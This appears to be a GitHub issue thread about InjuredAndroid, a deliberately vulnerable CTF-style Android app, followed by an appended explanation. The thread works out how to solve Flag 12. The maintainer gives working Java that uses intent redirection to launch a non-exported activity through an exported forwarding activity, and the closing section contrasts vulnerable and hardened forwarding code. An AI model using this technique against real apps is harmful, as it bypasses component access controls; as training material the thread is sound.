B3nac / InjuredAndroid

A vulnerable Android application that shows simple examples of vulnerabilities in a ctf style.
Apache License 2.0

Flag 12 - java.lang.SecurityException: Permission Denial #13

Closed 0xMineGo800m closed 2 years ago

0xMineGo800m commented 3 years ago

When I launch b3nac.injuredandroid.ExportedProtectedIntent while holding another Intent inside in order for it to launch b3nac.injuredandroid.FlagTwelveProtectedActivity I keep getting:

java.lang.SecurityException: Permission Denial: starting Intent { cmp=b3nac.injuredandroid/.FlagTwelveProtectedActivity (has extras) } from ProcessRecord{391b647 22147:com.example.tcmintentlauncher/u0a228} (pid=22147, uid=10228) not exported from uid 10227

This is the code I used in my POC app's onCreate() method:

```java
Intent intent = new Intent();
intent.setClassName("b3nac.injuredandroid", "b3nac.injuredandroid.FlagTwelveProtectedActivity");
intent.putExtra("totally_secure", "https://something.com");

Intent launchIntent = new Intent();
launchIntent.setClassName("b3nac.injuredandroid", "b3nac.injuredandroid.ExportedProtectedIntent");
launchIntent.putExtra("access_protected_component", intent);
startActivity(intent);
```

I also tried using the setComponent function instead of setClassName. Same result. Using flag11:// produced the same result as well.

I tried this on a rooted physical device (Android 8.0) and on an emulator as root (Android 9.0). Unless I add exported="true" to FlagTwelveProtectedActivity in AndroidManifest.xml and then repack the app, this activity will not launch...

Am I missing something?

B3nac commented 2 years ago

Hi @vangivang,

The main issue I see here is that the protected activity is being called first with startActivity(intent). The protected activity is accessible with the exported activity.

```java
Intent next = new Intent();
next.setClassName("b3nac.injuredandroid", "b3nac.injuredandroid.FlagTwelveProtectedActivity");
next.putExtra("totally_secure", "https://google.com");

Intent start = new Intent();
start.setClassName("b3nac.injuredandroid", "b3nac.injuredandroid.ExportedProtectedIntent");
start.putExtra("access_protected_component", next);

startActivity(start);
```

In the walk-through example the start intent, which is the ExportedProtectedIntent activity, is called first, followed by the next intent, which accesses the FlagTwelveProtectedActivity.

B3nac commented 2 years ago

Changing startActivity(intent); to startActivity(launchIntent); should fix the permissions error. I hope this helps!
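For context on why the exported activity is the only way into the protected one, here is an added illustration (not InjuredAndroid's own source) of the forwarding pattern this flag exercises, with the vulnerable line kept as a comment beside a hardened version. It assumes `FlagTwelveProtectedActivity` is a class in the same package and that the `https://` check is the policy the app wants for the `totally_secure` extra.

```java
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;

// Illustrative forwarding activity; hypothetical, not the project's real code.
public class ExportedProtectedIntent extends Activity {
    static final String EXTRA_INTENT = "access_protected_component";
    static final String EXTRA_URL = "totally_secure";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent supplied = getIntent().getParcelableExtra(EXTRA_INTENT);
        if (supplied == null) {
            finish();
            return;
        }

        // Vulnerable pattern (what the flag exercises): the caller's Intent is
        // started as-is. Its component can name any non-exported activity of
        // this app, and it runs with this app's identity, so the "not exported"
        // check the reporter hit no longer protects FlagTwelveProtectedActivity.
        // startActivity(supplied);

        // Hardened pattern: the target is fixed here. Only a validated string
        // extra is copied over; the caller's component, flags and data URI are
        // never forwarded.
        String url = supplied.getStringExtra(EXTRA_URL);
        if (!isAllowedUrl(url)) {
            finish();
            return;
        }
        Intent target = new Intent(this, FlagTwelveProtectedActivity.class);
        target.putExtra(EXTRA_URL, url);
        startActivity(target);
        finish();
    }

    // Assumed policy for this example: only absolute https URLs are accepted.
    static boolean isAllowedUrl(String url) {
        return url != null && url.startsWith("https://");
    }
}
```

With the hardened version, a caller-supplied Intent can no longer pick the destination, so restricting the activity with `android:exported="false"` actually holds; auditing the app's own `startActivity` calls for parcelled-Intent extras is the check that finds this class of bug.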